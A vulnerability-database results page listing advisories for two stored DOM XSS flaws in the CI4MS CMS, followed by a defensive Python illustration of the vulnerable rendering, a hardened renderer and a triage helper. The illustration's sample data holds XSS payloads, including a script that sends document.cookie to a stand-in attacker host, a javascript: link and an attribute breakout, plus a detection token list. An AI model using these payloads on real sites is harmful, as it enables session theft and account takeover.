35 matches found

RedhatCVE
added 2026/04/07 5:03 p.m. · 5 views

CVE-2026-35035

CI4MS is a CodeIgniter 4-based CMS skeleton that delivers a production-ready, modular architecture with RBAC authorization and theme support. Prior to 0.31.2.0, the application fails to properly sanitize user-controlled input within System Settings – Company Information. Several administrative...

CVSS 9 · AI score 6 · EPSS 0.00455
Exploits: 1 · References: 1
EUVD
added 2026/04/06 5:53 p.m. · 5 views

EUVD-2026-19374

CI4MS: Company Information Public-Facing Page Full Platform Compromise & Full Account Takeover for All Roles & Privilege-Escalation via System Settings Company Information Stored DOM XSS...

CVSS 7.2 · AI score 5.9 · EPSS 0.00455
Exploits: 1 · References: 2
OSV
added 2026/04/06 5:53 p.m. · 6 views

GHSA-5GHQ-42RG-769X CI4MS: Company Information Public-Facing Page Full Platform Compromise & Full Account Takeover for All Roles & Privilege-Escalation via System Settings Company Information Stored DOM XSS

An attacker can achieve Full Account Takeover & Privilege Escalation via Stored DOM Blind XSS on public-facing landing pages through the System Settings Company Information section, which allows the injection of XSS payloads...

CVSS 9.1 · AI score 5.8 · EPSS 0.00455
Exploits: 1 · References: 4
Snyk
added 2026/04/06 5:53 p.m. · 3 views

Cross-site Scripting (XSS)

Overview: ci4-cms-erp/ci4ms is a composer create-project ci4-cms-erp/ci4ms. Affected versions of this package are vulnerable to Cross-site Scripting (XSS) via unsanitized input in the Company Information configuration fields, which are stored and later rendered on public-facing pages. An attacker can...

CVSS 9 · AI score 6 · EPSS 0.00455
Exploits: 1 · References: 2
Github Security Blog
added 2026/04/06 5:53 p.m. · 7 views

CI4MS: Company Information Public-Facing Page Full Platform Compromise & Full Account Takeover for All Roles & Privilege-Escalation via System Settings Company Information Stored DOM XSS

An attacker can achieve Full Account Takeover & Privilege Escalation via Stored DOM Blind XSS on public-facing landing pages through the System Settings Company Information section, which allows the injection of XSS payloads...

CVSS 9 · AI score 5.2 · EPSS 0.00455
Exploits: 1 · References: 4 · Affected Software: 1
NVD
added 2026/04/06 5:17 p.m. · 5 views

CVE-2026-35035

CI4MS is a CodeIgniter 4-based CMS skeleton that delivers a production-ready, modular architecture with RBAC authorization and theme support. Prior to 0.31.2.0, the application fails to properly sanitize user-controlled input within System Settings – Company Information. Several administrative...

CVSS 9 · EPSS 0.00455
Exploits: 1 · References: 1
Cvelist
added 2026/04/06 4:49 p.m. · 20 views

CVE-2026-35035 CI4MS Company Information Public-Facing Page Full Platform Compromise & Full Account Takeover for All Roles & Privilege-Escalation via System Settings Company Information Stored DOM XSS

CI4MS is a CodeIgniter 4-based CMS skeleton that delivers a production-ready, modular architecture with RBAC authorization and theme support. Prior to 0.31.2.0, the application fails to properly sanitize user-controlled input within System Settings – Company Information. Several administrative...

CVSS 7.2 · EPSS 0.00455
Exploits: 1 · References: 1
ATTACKERKB
added 2026/04/06 4:49 p.m. · 2 views

CVE-2026-35035

CI4MS is a CodeIgniter 4-based CMS skeleton that delivers a production-ready, modular architecture with RBAC authorization and theme support. Prior to 0.31.2.0, the application fails to properly sanitize user-controlled input within System Settings – Company Information. Several administrative...

CVSS 7.2 · AI score 6 · EPSS 0.00455
Exploits: 1 · References: 2 · Affected Software: 1
Vulnrichment
added 2026/04/06 4:49 p.m. · 4 views

CVE-2026-35035 CI4MS Company Information Public-Facing Page Full Platform Compromise & Full Account Takeover for All Roles & Privilege-Escalation via System Settings Company Information Stored DOM XSS

CI4MS is a CodeIgniter 4-based CMS skeleton that delivers a production-ready, modular architecture with RBAC authorization and theme support. Prior to 0.31.2.0, the application fails to properly sanitize user-controlled input within System Settings – Company Information. Several administrative...

CVSS 7.2 · AI score 6 · EPSS 0.00455
Exploits: 1 · References: 1
CVE
added 2026/04/06 4:49 p.m. · 18 views

CVE-2026-35035

Summary: CVE-2026-35035 affects CI4MS (CodeIgniter 4-based CMS skeleton). A stored XSS vulnerability exists in System Settings – Company Information where attacker-controlled fields (e.g., Company Name, Slogan, contact fields, Google Maps link, media fields) are input and persisted server-side, t...

CVSS 9 · AI score 6 · EPSS 0.00455
Exploits: 1 · References: 1 · Affected Software: 1
Positive Technologies
added 2026/04/06 12:00 a.m. · 4 views

PT-2026-30680

Name of the Vulnerable Software and Affected Versions: CI4MS versions prior to 0.31.2.0. Description: CI4MS, a CodeIgniter 4-based CMS skeleton, is susceptible to a stored Cross-Site Scripting (XSS) issue. The application does not properly sanitize user-controlled input within the System Settings –...

CVSS 9.1 · AI score 5.8 · EPSS 0.00455
Exploits: 1 · References: 8
CNNVD
added 2026/04/06 12:00 a.m. · 8 views

CI4MS Cross-Site Scripting Vulnerability

CI4MS is an open-source blog page management tool developed by Ci4MS. Versions of CI4MS prior to 0.31.2.0 contain a cross-site scripting vulnerability. The vulnerability stems from the failure to properly sanitize user-controlled input in the System Settings – Company Information section. A...

CVSS 9 · AI score 5.6 · EPSS 0.00455
Exploits: 1 · References: 1
RedhatCVE
added 2026/04/02 10:55 p.m. · 4 views

CVE-2026-34562

CI4MS is a CodeIgniter 4-based CMS skeleton that delivers a production-ready, modular architecture with RBAC authorization and theme support. Prior to version 0.31.0.0, the application fails to properly sanitize user-controlled input within System Settings – Company Information. Several...

CVSS 9 · AI score 5.8 · EPSS 0.00274
Exploits: 1 · References: 1
NVD
added 2026/04/01 10:16 p.m. · 3 views

CVE-2026-34562

CI4MS is a CodeIgniter 4-based CMS skeleton that delivers a production-ready, modular architecture with RBAC authorization and theme support. Prior to version 0.31.0.0, the application fails to properly sanitize user-controlled input within System Settings – Company Information. Several...

CVSS 9 · EPSS 0.00274
Exploits: 1 · References: 2
EUVD
added 2026/04/01 10:03 p.m. · 6 views

EUVD-2026-18074

CI4MS: System Settings Company Information Full Platform Compromise & Full Account Takeover for All-Roles & Privilege-Escalation via Stored DOM XSS...

CVSS 4.7 · AI score 5.8 · EPSS 0.00274
Exploits: 1 · References: 2
Snyk
added 2026/04/01 10:03 p.m. · 3 views

Cross-site Scripting (XSS)

Overview: ci4-cms-erp/ci4ms is a composer create-project ci4-cms-erp/ci4ms. Affected versions of this package are vulnerable to Cross-site Scripting (XSS) via unsanitized input in the Company Information configuration fields within the system settings. An attacker can execute arbitrary JavaScript in...

CVSS 9 · AI score 6 · EPSS 0.00274
Exploits: 1 · References: 2
OSV
added 2026/04/01 10:03 p.m. · 1 view

GHSA-V897-C6VQ-6CR3 CI4MS: System Settings (Company Information) Full Platform Compromise & Full Account Takeover for All-Roles & Privilege-Escalation via Stored DOM XSS

Summary: Vulnerability: Stored DOM XSS via System Settings – Company Information. Same-Page Attribute Breakout & Persistent Payload Injection - Stored Cross-Site Scripting via Unsanitized Company Information Configuration Fields with Immediate Same-Page Execution. Description: The application fails t...

CVSS 4.7 · AI score 6.2 · EPSS 0.00274
Exploits: 1 · References: 4
Github Security Blog
added 2026/04/01 10:03 p.m. · 5 views

CI4MS: System Settings (Company Information) Full Platform Compromise & Full Account Takeover for All-Roles & Privilege-Escalation via Stored DOM XSS

Summary: Vulnerability: Stored DOM XSS via System Settings – Company Information. Same-Page Attribute Breakout & Persistent Payload Injection - Stored Cross-Site Scripting via Unsanitized Company Information Configuration Fields with Immediate Same-Page Execution. Description: The application fails t...

CVSS 9 · AI score 6.2 · EPSS 0.00274
Exploits: 1 · References: 4 · Affected Software: 1
Vulnrichment
added 2026/04/01 9:23 p.m. · 2 views

CVE-2026-34562 CI4MS: System Settings (Company Information) Full Platform Compromise & Full Account Takeover for All-Roles & Privilege-Escalation via Stored DOM XSS

CI4MS is a CodeIgniter 4-based CMS skeleton that delivers a production-ready, modular architecture with RBAC authorization and theme support. Prior to version 0.31.0.0, the application fails to properly sanitize user-controlled input within System Settings – Company Information. Several...

CVSS 4.7 · AI score 5.8 · EPSS 0.00274
Exploits: 1 · References: 2
CVE
added 2026/04/01 9:23 p.m. · 9 views

CVE-2026-34562

CI4MS (CodeIgniter 4-based CMS skeleton) prior to 0.31.0.0 suffers a stored DOM XSS vulnerability in System Settings – Company Information. Attacker-controlled inputs in fields such as Company Name, Slogan, contact details, and Google Maps/ media links are stored server-side and rendered without ...

CVSS 9 · AI score 5.8 · EPSS 0.00274
Exploits: 1 · References: 2 · Affected Software: 1
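The entries above all describe the same mechanism: administrator-controlled Company Information fields (Company Name, Slogan, contact fields, the Google Maps link) are persisted server-side and later interpolated into public-facing pages without output encoding, so a stored value can break out of an HTML attribute or inject a script element. The following is an added illustration written for this page, not code from CI4MS or from any of the advisories. It models that sink beside a hardened renderer and adds a triage helper for finding payloads that were stored before a fix. The field names follow the CVE text; the template, the helper names and the sample values are assumptions.

```python
"""Stored XSS in "Company Information" style settings: sink and fix.

Added illustration, not code from CI4MS or its advisories. It models the
flaw the entries above describe (administrator-controlled settings persisted
server-side and later rendered into public pages without output encoding)
beside a hardened renderer. The field names follow the CVE text; the
template, the helper names and the sample values are assumptions.
"""
from html import escape
from urllib.parse import urlsplit

# Constructed sample settings row: what a malicious (or phished) administrator
# might save. Each value targets a different rendering context.
COMPANY_INFO = {
    "company_name": '<script>fetch("//attacker.example/?c="+document.cookie)</script>',
    "slogan": "Quality first",
    "maps_link": "javascript:alert(document.domain)",
    "phone": '" onmouseover="alert(1)',
}


def render_vulnerable(info: dict) -> str:
    """Interpolates stored settings verbatim: the bug class in the advisories.

    The phone value breaks out of the attribute ("attribute breakout"), the
    name injects a script element, and the maps link becomes a javascript: URL.
    """
    return (
        f'<h1 class="brand">{info["company_name"]}</h1>\n'
        f'<p class="slogan">{info["slogan"]}</p>\n'
        f'<a href="{info["maps_link"]}">Find us</a>\n'
        f'<input type="text" value="{info["phone"]}" readonly>'
    )


def safe_url(candidate: str) -> str:
    """Keeps only absolute http(s) URLs; anything else (javascript:, data:,
    vbscript:, relative junk) is dropped. Escaping alone does not fix a URL
    context, so validate the scheme before encoding."""
    stripped = candidate.strip()
    parts = urlsplit(stripped)
    if parts.scheme.lower() in ("http", "https") and parts.netloc:
        return stripped
    return ""


def render_hardened(info: dict) -> str:
    """Context-aware output encoding for the same template.

    html.escape(quote=True) encodes < > & " ' so the value is inert both as
    element text and inside a double- or single-quoted attribute.
    """
    name = escape(info["company_name"], quote=True)
    slogan = escape(info["slogan"], quote=True)
    link = escape(safe_url(info["maps_link"]), quote=True)
    phone = escape(info["phone"], quote=True)
    return (
        f'<h1 class="brand">{name}</h1>\n'
        f'<p class="slogan">{slogan}</p>\n'
        f'<a href="{link}">Find us</a>\n'
        f'<input type="text" value="{phone}" readonly>'
    )


def contains_active_content(html: str) -> bool:
    """Coarse oracle: does the rendered page still carry a live script element,
    an attribute breakout into an event handler, or a javascript: href?"""
    lowered = html.lower()
    return (
        "<script" in lowered
        or '" onmouseover=' in lowered
        or 'href="javascript:' in lowered
    )


SUSPICIOUS_TOKENS = ("<", "javascript:", "onerror=", "onload=", "onmouseover=")


def flag_suspicious(info: dict) -> list:
    """Triage helper: names of stored settings fields that contain markup or
    script-bearing tokens. After upgrading, run this over the persisted
    settings to find payloads planted before the fix; patching the renderer
    does not remove data already stored."""
    return [
        field for field, value in info.items()
        if any(token in value.lower() for token in SUSPICIOUS_TOKENS)
    ]


if __name__ == "__main__":
    print("vulnerable:\n" + render_vulnerable(COMPANY_INFO))
    print("\nhardened:\n" + render_hardened(COMPANY_INFO))
    print("\nsuspicious fields:", flag_suspicious(COMPANY_INFO))
```

In a CodeIgniter 4 view the equivalent of `escape()` is the framework's `esc()` helper, with `esc($value, 'attr')` for attribute context; the URL field still needs scheme validation on top of escaping, because an HTML-encoded `javascript:` link is unchanged and still executes on click. The triage helper is deliberately coarse (a legitimate slogan containing `<` is flagged too) and is meant for a responder reviewing the settings table after an upgrade, not as an input filter.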